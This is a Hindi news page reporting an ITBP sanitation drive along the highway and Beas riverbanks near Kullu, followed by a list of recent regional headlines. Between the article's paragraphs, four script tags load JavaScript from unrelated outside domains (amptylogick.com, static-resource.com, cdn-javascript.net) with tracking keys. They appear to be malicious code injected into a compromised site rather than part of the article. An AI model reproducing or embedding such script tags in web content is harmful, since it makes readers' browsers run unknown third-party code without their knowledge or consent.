Categories: हिमाचल

ITBP का स्वच्छता अभियान लोगों को कर रहा है प्रेरितः सहायक कमाण्डेंट कर्ण

<p>भारत-तिब्बत सीमा पुलिस वाहिनी बबेली के जवान आजकल राष्ट्रीय राजमार्ग और ब्यास नदी के किनारे हर रोज सफाई करते नजर आ रहे हैं। जवानों के साथ मौजूद सहायक कमाण्डेंट कर्ण ने बताया कि आईटीबीपी का स्वच्छता पखवाड़ा जारी है जो 15 दिसम्बर तक चलेगा। उन्होंने बताया कि वाहिनी के कमांडेंट के निर्देशानुसार ईको-साईट, राष्ट्रीय राजमार्ग पर बवेली से डोभी की ओर और कुल्लू की ओर के अलावा इसी क्षेत्र में ब्यास नदी के किनारों पर व्यापक सफाई अभियान चलाया जा रहा है।</p>

<p>उन्होंने बताया कि जवान बड़ी शिद्दत के साथ सफाई अभियान को अंजाम दे रहे हैं और बारीक से बारीक कचरे को उठाकर स्थलों को पूरी तरह साफ-सुथरा बनाया जा रहा है। यह देखकर खुशी होती है कि जवानों को सफाई करते देख हर कोई वाहन रोककर इनकी प्रशंसा करता है और निश्चित तौर पर स्वच्छता के प्रति जागरूक और प्रेरित भी होता है। कुल्लू-मनाली की विश्व स्तर पर पहचान है और राष्ट्रीय राजमार्ग के किनारे सफाई करते जवानाों का यह संदेश दूर-दूर तक जा रहा है।</p>
<script src=”//amptylogick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1575717685278″ type=”text/javascript”></script>
<script src=”http://amptylogick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

28 सितंबर को शांतिपूर्ण प्रदर्शन, फैसला न आने पर जेल भरो आंदोलन

  Shimla: संजौली अवैध मस्जिद विवाद शांत नहीं हुआ है। 28 सितंबर को देवभूमि संघर्ष…

28 mins ago

कंगना का कांग्रेस पर करारा वार: कांग्रेस को बच्चे पालने का शौक, पप्पू और बहन की हरकतें बचकानी

  Mandi: मंडी के गोहर में एक कार्यक्रम में सांसद कंगना ने कांग्रेस के शीर्ष…

59 mins ago

पीएम मोदी कर रहे बदनाम, हिमाचलआर्थिक तंगी से नहीं जूझ रहा: डिप्टी सीएम

  Sirmour: उपमुख्यमंत्री मुकेश अग्निहोत्री ने आरोप लगाया है कि भाजपा के केंद्रीय व प्रदेश…

2 hours ago

स्वच्छ रहेगा घर, नगर व पंचायत तभी तो स्वस्थ रहेगा इंसान: उषा बिरला

  Hamirpur: ग्राम पंचायत दडूही में सोमवार को स्वच्छ भारत मिशन के तहत स्वच्छता पखवाड़ा…

2 hours ago

शहीदों को नमन, शहीद स्मारक पर दी गई श्रद्धांजलि

  Mandi: भूतपूर्व सैनिक लीग मंडी द्वारा सोमवार को मंडी के शहीद स्मारक में 1965…

3 hours ago

आरक्षण पर कुठाराघात, केंद्र सरकार पर प्रेम कौशल का निशाना

  Hamirpur: हिमाचल प्रदेश कांग्रेस के मुख्य प्रवक्ता प्रेम कौशल ने कहा कि दलित वर्ग…

3 hours ago